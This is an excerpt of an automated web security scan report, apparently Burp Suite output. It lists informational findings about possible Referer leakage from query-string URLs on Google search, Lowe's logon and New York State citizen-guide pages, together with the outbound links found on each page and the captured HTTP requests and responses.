Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; NID=48=G8GXu_mu_V4v5YxE2RqVYl3gQcYLRg30PTyN25cOw1cLTLBKpupiwM_D9n2e3-VyC48S_mOn73wfajzGDfFiwn12C9Ufm9LtLqm9u-FMzXndz4J5LJqChVjL88zMCKHU

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Date: Wed, 13 Jul 2011 11:37:46 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: mfe
Content-Length: 153919
X-XSS-Protection: 1; mode=block

<!DOCTYPE html><html class="no-maps-mini" xmlns:v="urn:schemas-microsoft-com:vml"> <head> <meta content="text/html;charset=UTF-8" http-equiv="content-type"/> <meta content="Find local businesses, vie
...[SNIP]...
<a class="kd-button print-button left small" title="Print" jsaction="print.show" href="javascript:void(0);" id="print"> <img class="print" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </a> <a class="kd-button email-button mid small" title="Send" jsaction="stx.show" href="javascript:void(0);" id="showsendtox"> <img class="send" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </a> <a class="kd-button permalink-button right small" title="Link" jsaction="link.show" href="javascript:void(0);" id="link"> <img class="link" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </a>
...[SNIP]...
<button class="kd-button kd-button-submit" title="Search Maps" type="submit" id="q-sub" name="btnG" tabindex="2"> <img class="search-white" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </button>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/smc.png"/> <div class="smcpanup" id="pan_up_inline" jsaction="smc.selectPanUp">
...[SNIP]...
</div> <img class="hide-msie-6 logo" src="http://maps.gstatic.com/mapfiles/poweredby.png"/> </a>
...[SNIP]...
<a id="d_close" href="javascript:void(0)" jsaction="llm.close" jstrack="1"> <img class="close" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </a>
...[SNIP]...
sName: 'kd-button' + ($count > 1 ? lt($index, 1) ? ' left' : gt($index, $count - 2) ? ' right' : ' mid' : '');" class="kd-button" href="javascript:void(0)" tabindex="3" jsaction="tm.click"> <img jsattrs="className: 'dir-tm-' + $this" class="dir-tm-d" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </a>
...[SNIP]...
<a class="kd-button" id="dir_rev" href="javascript:void(0)"> <img class="dir-reverse" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </a>
...[SNIP]...
<div class="icon " log="" jsaction="app.openInfoWindow" jsprops="markerid:'A'" jstrack="ioMdToz9EKHozQXy2IzFBw" ved=0CAkQ_gswAA id="marker_A_1"><img alt="A" src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="mp iconA"/></div>
...[SNIP]...

12.14. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=soris

The response contains the following links to other domains:

http://acronyms.thefreedictionary.com/SORIS
http://dragonage.wikia.com/wiki/Soris
http://investing.businessweek.com/research/stocks/private/snapshot.asp?privcapId=23339880
http://soris.us/
http://webcache.googleusercontent.com/search?q=cache:1H132Wn0iAsJ:www.soris.torino.it/+soris&cd=7&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:7LOeZZJ_2DgJ:acronyms.thefreedictionary.com/SORIS+soris&cd=5&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:Hpnxu0viENQJ:soris.us/+soris&cd=3&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:ZQPJaxF6dCEJ:dragonage.wikia.com/wiki/Soris+soris&cd=1&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:_BUa3ZEPqH0J:www.tripadvisor.com/Hotel_Review-g285731-d2076935-Reviews-Casa_Eloida_Soris_Vera-Trinidad_Cuba.html+soris&cd=9&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:dZBOFwuZ5AMJ:www.facebook.com/people/Ashanthi-Soris/654121635+soris&cd=10&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:vLfn1CgGnNwJ:www.uesp.net/wiki/Oblivion:Soris_Arenim+soris&cd=6&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:zk0W3EE4Aq4J:www.soris.org/+soris&cd=2&hl=en&ct=clnk&gl=us&source=www.google.com
http://www.bobbiesoris.com/
http://www.facebook.com/people/Ashanthi-Soris/654121635
http://www.soris.org/
http://www.soris.torino.it/
http://www.tripadvisor.com/Hotel_Review-g285731-d2076935-Reviews-Casa_Eloida_Soris_Vera-Trinidad_Cuba.html
http://www.uesp.net/wiki/Oblivion:Soris_Arenim
http://www.youtube.com/results?q=soris&um=1&ie=UTF-8&sa=N&hl=en&tab=w1

Request

GET /search?sourceid=chrome&ie=UTF-8&q=soris HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; NID=48=G8GXu_mu_V4v5YxE2RqVYl3gQcYLRg30PTyN25cOw1cLTLBKpupiwM_D9n2e3-VyC48S_mOn73wfajzGDfFiwn12C9Ufm9LtLqm9u-FMzXndz4J5LJqChVjL88zMCKHU

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 11:39:22 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/vD843DpA.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 90444

<!doctype html> <head> <title>soris - Google Search</title> <script>window.google={kEI:"6oMdTpWED4jGgAfVlrTUCQ",kEXPI:"17259,23756,24692,24878,24879,27400,28505,28936,29702,29859,30316,30465,31
...[SNIP]...
<li class=gbmtc><a class=gbmt id=gb_36 onclick="gbar.qsj(this);gbar.logger.il(1,{t:36})" href="http://www.youtube.com/results?q=soris&um=1&ie=UTF-8&sa=N&hl=en&tab=w1">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://dragonage.wikia.com/wiki/Soris" class=l onmousedown="return clk(this.href,'','','','1','','0CBgQFjAA')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:ZQPJaxF6dCEJ:dragonage.wikia.com/wiki/Soris+soris&cd=1&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CB0QIDAA')">Cached</a>
...[SNIP]...
<div class=osl><a href="http://dragonage.wikia.com/wiki/Soris#Involvement" onmousedown="return clk(this.href,'','','','1','','0CB8Q0gIoADAA')">Involvement</a> - <a href="http://dragonage.wikia.com/wiki/Soris#Strategy" onmousedown="return clk(this.href,'','','','1','','0CCAQ0gIoATAA')">Strategy</a> - <a href="http://dragonage.wikia.com/wiki/Soris#Epilogue" onmousedown="return clk(this.href,'','','','1','','0CCEQ0gIoAjAA')">Epilogue</a> - <a href="http://dragonage.wikia.com/wiki/Soris#Bugs" onmousedown="return clk(this.href,'','','','1','','0CCIQ0gIoAzAA')">Bugs</a>
...[SNIP]...
<h3 class="r"><a href="http://www.soris.org/" class=l onmousedown="return clk(this.href,'','','','2','','0CCQQFjAB')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:zk0W3EE4Aq4J:www.soris.org/+soris&cd=2&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','2','','0CCkQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://soris.us/" class=l onmousedown="return clk(this.href,'','','','3','','0CCsQFjAC')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:Hpnxu0viENQJ:soris.us/+soris&cd=3&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','3','','0CDAQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://investing.businessweek.com/research/stocks/private/snapshot.asp?privcapId=23339880" class=l onmousedown="return clk(this.href,'','','','4','','0CDIQFjAD')"><em>
...[SNIP]...
<h3 class="r"><a href="http://acronyms.thefreedictionary.com/SORIS" class=l onmousedown="return clk(this.href,'','','','5','','0CDgQFjAE')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:7LOeZZJ_2DgJ:acronyms.thefreedictionary.com/SORIS+soris&cd=5&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','5','','0CD0QIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.uesp.net/wiki/Oblivion:Soris_Arenim" class=l onmousedown="return clk(this.href,'','','','6','','0CD4QFjAF')">Oblivion:<em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:vLfn1CgGnNwJ:www.uesp.net/wiki/Oblivion:Soris_Arenim+soris&cd=6&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','6','','0CEMQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.soris.torino.it/" class=l onmousedown="return clk(this.href,'','','','7','','0CEUQFjAG')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:1H132Wn0iAsJ:www.soris.torino.it/+soris&cd=7&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','7','','0CEoQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.bobbiesoris.com/" class=l onmousedown="return clk(this.href,'','','','8','','0CE4QFjAH')">Bobbie <em>
...[SNIP]...
<h3 class="r"><a href="http://www.tripadvisor.com/Hotel_Review-g285731-d2076935-Reviews-Casa_Eloida_Soris_Vera-Trinidad_Cuba.html" class=l onmousedown="return clk(this.href,'','','','9','','0CFMQFjAI')">Casa Eloida <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:_BUa3ZEPqH0J:www.tripadvisor.com/Hotel_Review-g285731-d2076935-Reviews-Casa_Eloida_Soris_Vera-Trinidad_Cuba.html+soris&cd=9&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','9','','0CFkQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.facebook.com/people/Ashanthi-Soris/654121635" class=l onmousedown="return clk(this.href,'','','','10','','0CFoQFjAJ')">Ashanthi <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:dZBOFwuZ5AMJ:www.facebook.com/people/Ashanthi-Soris/654121635+soris&cd=10&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','10','','0CF8QIDAJ')">Cached</a>
...[SNIP]...

12.15. https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.lowes.com
Path:	/webapp/wcs/stores/servlet/LogonForm

Issue detail

The page was loaded from a URL containing a query string:

https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm?langId=-1&storeId=10151&catalogId=10051&krypto=w37ixU9mxd51c2GEFG7BpBTiHMF%2BPtrjg%2F5ZFfDHXjuTogRqSuGR4efV6fa7g5SaSXQQW3naq2iX%0AFpd3O3L2OA%3D%3D

The response contains the following link to another domain:

https://www.bbb.org/online/consumer/cks.aspx?ID=1080715144129

Request

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-store, no-cache
Expires: now
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 63497
Date: Wed, 13 Jul 2011 02:03:06 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: stop_mobi=yes; path=/; domain=.lowes.com; expires=Wed, 13-Jul-2011 02:33:05 GMT
Set-Cookie: TS176ebc=213d8656075767f35a1f9b520e396fbdceb6ace724ef15e34e1cfb7e; Path=/
Set-Cookie: akaau=1310524386~id=21017306f05776f813565f0d22f0d790; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

...[SNIP]...
<li><a name="FOOTER_2_BBB" href="https://www.bbb.org/online/consumer/cks.aspx?ID=1080715144129" onclick="window.open('https://www.bbb.org/online/consumer/cks.aspx?ID=1080715144129'); return false;"><img src="/images/icon-bbb.jpg" alt="" />
...[SNIP]...

12.16. http://www.nysegov.com/citGuide.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nysegov.com
Path:	/citGuide.cfm

Issue detail

The page was loaded from a URL containing a query string:

http://www.nysegov.com/citGuide.cfm?superCat=102&cat=449&content=main

The response contains the following links to other domains:

http://www.cvb.state.ny.us/Espanol.aspx
http://www.ny.gov/
http://www.ny.gov/contactus/index.html
http://www.ny.gov/disclaimer/index.html
http://www.ny.gov/howdoi/index.html
http://www.ny.gov/privacy/index.html
http://www.omh.state.ny.us/omhweb/index_sp.html

Request

GET /citGuide.cfm?superCat=102&cat=449&content=main HTTP/1.1
Host: www.nysegov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.17. http://www.nysegov.com/citguide.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nysegov.com
Path:	/citguide.cfm

Issue detail

The page was loaded from a URL containing a query string:

http://www.nysegov.com/citguide.cfm?context=citguide&content=munibyalpha

The response contains the following links to other domains:

http://attica.org/
http://ci.auburn.ny.us/
http://co.cayuga.ny.us/aurelius/
http://co.cayuga.ny.us/aurora/
http://hamiltoncounty.com/
http://orleansny.com/
http://townofannsville.org/
http://townofava.org/
http://villageofantwerp.net/
http://villageofarcade.org/
http://www.airmont.org/
http://www.albanycounty.com/
http://www.albanyny.org/
http://www.alden.erie.gov/
http://www.alexandria-bay.ny.us/
http://www.alfredny.org/
http://www.allegany.org/
http://www.alleganyco.com/
http://www.altamontvillage.org/
http://www.ameniany.gov/
http://www.amherst.ny.us/
http://www.amityville.com/
http://www.angelica-ny.com/
http://www.ardsleyvillage.com/
http://www.argyleny.com/
http://www.arkportvillage.com/
http://www.asharoken.com/
http://www.austerlitzny.com/
http://www.avon-ny.org/TownofAvon
http://www.avon-ny.org/VillageofAvon/
http://www.co.cattaraugus.ny.us/
http://www.co.cayuga.ny.us/
http://www.co.dutchess.ny.us/
http://www.co.jefferson.ny.us/
http://www.co.livingston.state.ny.us/
http://www.co.montgomery.ny.us/
http://www.co.oswego.ny.us/
http://www.co.rockland.ny.us/
http://www.co.suffolk.ny.us/
http://www.co.washington.ny.us/
http://www.columbiacountyny.com/
http://www.erie.gov/
http://www.erie.gov/akron
http://www.nassaucountyny.gov/
http://www.ny.gov/
http://www.ny.gov/contactus/index.html
http://www.ny.gov/disclaimer/index.html
http://www.ny.gov/howdoi/index.html
http://www.ny.gov/privacy/index.html
http://www.oneidacounty.org/
http://www.steubencony.org/
http://www.townofalbion-ny.us/
http://www.townofalbion.com/
http://www.townofamsterdam.org/
http://www.townofarietta.com/
http://www.townofaurora.com/
http://www.vil.albion.ny.us/
http://www.villageofandover.com/
http://www.villageofangola.org/
http://www.vofab.org/
http://www.westchestergov.com/
http://www.wyomingco.net/
http://www.wyomingco.net/towns/townofarcade.htm
http://www.wyomingco.net/towns/townofattica.htm

Request

GET /citguide.cfm?context=citguide&content=munibyalpha HTTP/1.1
Host: www.nysegov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 13 Jul 2011 01:50:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

               <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

               <html lang="en-US">
               <head>
                   <title>New York State | Citizen Guide</title>

                   <link rel="STYLESHEET" type
...[SNIP]...
<div style="height: 28px; background-color: #003366;border:#999 1px solid;width:754px;margin:0 auto; clear:both;text-align:center">
    <a href="http://www.ny.gov"><img style="float: left; border:none;" src="nysbannerpics/banner_img1.png" alt="NY.gov Portal" />
...[SNIP]...
<br />
   <a href="http://www.ny.gov/howdoi/index.html" onmouseup="quickChange(menuItem14a,'images/pg2slice_18b-over.gif')" onmousedown="quickChange(menuItem14a,'images/pg2slice_18b-over.gif')" onmouseover="quickChange(menuItem14a,'images/pg2slice_18b-over.gif')" onmouseout="quickChange(menuItem14a,'images/pg2slice_18a.gif')"><img id="menuItem14a" src="images/pg2slice_18a.gif" height="19" width="188" alt="How Do I?" border="0" />
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0"> 
                                   <a href="http://www.airmont.org" title="Visit Village of Airmont Website">
...[SNIP]...
<td>

                                           <a href="http://www.co.rockland.ny.us/" title="Rockland County website">Rockland County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0"> 
                                   <a href="http://www.erie.gov/akron" title="Visit Village of Akron Website">
...[SNIP]...
<td>

                                           <a href="http://www.erie.gov/" title="Erie County website">Erie County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0"> 
                                   <a href="http://www.Albanycounty.com" title="Visit Albany County Website">
...[SNIP]...
<td>

                                           <a href="http://www.Albanycounty.com" title="Albany County website">Albany County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0"> 
                                   <a href="http://www.albanyny.org/" title="Visit City of Albany Website">
...[SNIP]...
<td>

                                           <a href="http://www.Albanycounty.com" title="Albany County website">Albany County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0"> 
                                   <a href="http://www.townofalbion.com" title="Visit Town of Albion Website">
...[SNIP]...
<td>

                                           <a href="http://orleansny.com" title="Orleans County website">Orleans County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0"> 
                                   <a href="http://www.townofalbion-ny.us/" title="Visit Town of Albion Website">
...[SNIP]...
<td>

                                           <a href="http://www.co.oswego.ny.us" title="Oswego County website">Oswego County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0"> 
                                   <a href="http://www.vil.albion.ny.us" title="Visit Village of Albion Website">
...[SNIP]...
<td>

                                           <a href="http://orleansny.com" title="Orleans County website">Orleans County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0"> 
                                   <a href="http://www.alden.erie.gov" title="Visit Town of Alden Website">
...[SNIP]...
<td>

                                           <a href="http://www.erie.gov/" title="Erie County website">Erie County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0"> 
                                   <a href="http://www.alexandria-bay.ny.us" title="Visit Village of Alexandria Bay Website">
...[SNIP]...
<td>

                                           <a href="http://www.co.jefferson.ny.us/" title="Jefferson County website">Jefferson County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0"> 
                                   <a href="http://www.alfredny.org" title="Visit Village of Alfred Website">
...[SNIP]...
<td>

                                           <a href="http://www.alleganyco.com/" title="Allegany County website">Allegany County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0"> 
                                   <a href="http://www.allegany.org" title="Visit Village of Allegany Website">
...[SNIP]...
<td>

                                           <a href="http://www.co.cattaraugus.ny.us" title="Cattaraugus County website">Cattaraugus County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0"> 
                                   <a href="http://www.allegany.org" title="Visit Town of Allegany Website">
...[SNIP]...
<td>

                                           <a href="http://www.co.cattaraugus.ny.us" title="Cattaraugus County website">Cattaraugus County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0"> 
                                   <a href="http://www.alleganyco.com/" title="Visit Allegany County Website">
...[SNIP]...
<td>

                                           <a href="http://www.alleganyco.com/" title="Allegany County website">Allegany County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0"> 
                                   <a href="http://www.altamontvillage.org" title="Visit Village of Altamont Website">
...[SNIP]...
<td>

                                           <a href="http://www.Albanycounty.com" title="Albany County website">Albany County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0"> 
                                   <a href="http://www.ameniany.gov" title="Visit Town of Amenia Website">
...[SNIP]...
<td>

                                           <a href="http://www.co.dutchess.ny.us" title="Dutchess County website">Dutchess County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0"> 
                                   <a href="http://www.amherst.ny.us" title="Visit Town of Amherst Website">
...[SNIP]...
<td>

                                           <a href="http://www.erie.gov/" title="Erie County website">Erie County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0"> 
                                   <a href="http://www.amityville.com/" title="Visit Village of Amityville Website">
...[SNIP]...
<td>

                                           <a href="http://www.co.suffolk.ny.us/" title="Suffolk County website">Suffolk County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0"> 
                                   <a href="http://www.townofamsterdam.org" title="Visit Town of Amsterdam Website">
...[SNIP]...
<td>

                                           <a href="http://www.co.montgomery.ny.us/" title="Montgomery County website">Montgomery County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0"> 
                                   <a href="http://www.villageofandover.com" title="Visit Village of Andover Website">
...[SNIP]...
<td>

                                           <a href="http://www.alleganyco.com/" title="Allegany County website">Allegany County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0"> 
                                   <a href="http://www.angelica-ny.com" title="Visit Village of Angelica Website">
...[SNIP]...
<td>

                                           <a href="http://www.alleganyco.com/" title="Allegany County website">Allegany County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0"> 
                                   <a href="http://www.villageofangola.org" title="Visit Village of Angola Website">
...[SNIP]...
<td>

                                           <a href="http://www.erie.gov/" title="Erie County website">Erie County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0"> 
                                   <a href="http://townofannsville.org" title="Visit Town of Annsville Website">
...[SNIP]...
<td>

                                           <a href="http://www.oneidacounty.org" title="Oneida County website">Oneida County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0"> 
                                   <a href="http://villageofantwerp.net/" title="Visit Village of Antwerp Website">
...[SNIP]...
<td>

                                           <a href="http://www.co.jefferson.ny.us/" title="Jefferson County website">Jefferson County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0"> 
                                   <a href="http://villageofarcade.org/" title="Visit Village of Arcade Website">
...[SNIP]...
<td>

                                           <a href="http://www.wyomingco.net/" title="Wyoming County website">Wyoming County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0"> 
                                   <a href="http://www.wyomingco.net/towns/townofarcade.htm" title="Visit Town of Arcade Website">
...[SNIP]...
<td>

                                           <a href="http://www.wyomingco.net/" title="Wyoming County website">Wyoming County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0"> 
                                   <a href="http://www.ardsleyvillage.com" title="Visit Village of Ardsley Website">
...[SNIP]...
<td>

                                           <a href="http://www.westchestergov.com/" title="Westchester County website">Westchester County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0"> 
                                   <a href="http://www.argyleny.com" title="Visit Town of Argyle Website">
...[SNIP]...
<td>

                                           <a href="http://www.co.washington.ny.us" title="Washington County website">Washington County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0"> 
                                   <a href="http://www.townofarietta.com" title="Visit Town of Arietta Website">
...[SNIP]...
<td>

                                           <a href="http://hamiltoncounty.com" title="Hamilton County website">Hamilton County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0"> 
                                   <a href="http://www.arkportvillage.com" title="Visit Village of Arkport Website">
...[SNIP]...
<td>

                                           <a href="http://www.steubencony.org/" title="Steuben County website">Steuben County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0"> 
                                   <a href="http://www.asharoken.com/" title="Visit Village of Asharoken Website">
...[SNIP]...
<td>

                                           <a href="http://www.co.suffolk.ny.us/" title="Suffolk County website">Suffolk County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0"> 
                                   <a href="http://www.vofab.org" title="Visit Village of Atlantic Beach Website">
...[SNIP]...
<td>

                                           <a href="http://www.nassaucountyny.gov/" title="Nassau County website">Nassau County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0"> 
                                   <a href="http://attica.org" title="Visit Village of Attica Website">
...[SNIP]...
<td>

                                           <a href="http://www.wyomingco.net/" title="Wyoming County website">Wyoming County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0"> 
                                   <a href="http://www.wyomingco.net/towns/townofattica.htm" title="Visit Town of Attica Website">
...[SNIP]...
<td>

                                           <a href="http://www.wyomingco.net/" title="Wyoming County website">Wyoming County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0"> 
                                   <a href="http://ci.auburn.ny.us" title="Visit City of Auburn Website">
...[SNIP]...
<td>

                                           <a href="http://www.co.cayuga.ny.us/" title="Cayuga County website">Cayuga County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0"> 
                                   <a href="http://co.cayuga.ny.us/aurelius/" title="Visit Town of Aurelius Website">
...[SNIP]...
<td>

                                           <a href="http://www.co.cayuga.ny.us/" title="Cayuga County website">Cayuga County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0"> 
                                   <a href="http://co.cayuga.ny.us/aurora/" title="Visit Village of Aurora Website">
...[SNIP]...
<td>

                                           <a href="http://www.co.cayuga.ny.us/" title="Cayuga County website">Cayuga County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0"> 
                                   <a href="http://www.townofaurora.com" title="Visit Town of Aurora Website">
...[SNIP]...
<td>

                                           <a href="http://www.erie.gov/" title="Erie County website">Erie County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0"> 
                                   <a href="http://www.austerlitzny.com" title="Visit Town of Austerlitz Website">
...[SNIP]...
<td>

                                           <a href="http://www.columbiacountyny.com/" title="Columbia County website">Columbia County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0"> 
                                   <a href="http://townofava.org" title="Visit Town of Ava Website">
...[SNIP]...
<td>

                                           <a href="http://www.oneidacounty.org" title="Oneida County website">Oneida County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0"> 
                                   <a href="http://www.avon-ny.org/TownofAvon" title="Visit Town of Avon Website">
...[SNIP]...
<td>

                                           <a href="http://www.co.livingston.state.ny.us/" title="Livingston County website">Livingston County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0"> 
                                   <a href="http://www.avon-ny.org/VillageofAvon/" title="Visit Village of Avon Website">
...[SNIP]...
<td>

                                           <a href="http://www.co.livingston.state.ny.us/" title="Livingston County website">Livingston County</a>
...[SNIP]...
<td align="right" colspan="2" class="bottomgrid" style="color:#DEDEDC" valign="bottom">
               <a href="http://www.ny.gov" title="NYS Home Page" style="text-decoration:none;"><img src="frameparts/nyshome.gif" alt="NYS Home Page" width="79" height="6" align="bottom" style="border:none;">
...[SNIP]...
</a>
               |
               <a href="http://www.ny.gov/contactus/index.html" title="Contact Us"><img src="frameparts/contactus.gif" alt="Contact Us" width="62" height="6" align="bottom" style="border:none;"></a>
               |
               <a href="http://www.ny.gov/privacy/index.html" title="Privacy Policy"><img src="frameparts/privacypolicy.gif" width="79" height="6" align="bottom" alt="Privacy Policy" style="border:none;"></a>
               |
               <a href="http://www.ny.gov/disclaimer/index.html" title="Disclaimer"><img src="frameparts/disclaimer.gif" width="57" height="6" alt="Disclaimer" align="bottom" style="border:none;">
...[SNIP]...

12.18. http://www.search.state.ny.us/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.search.state.ny.us
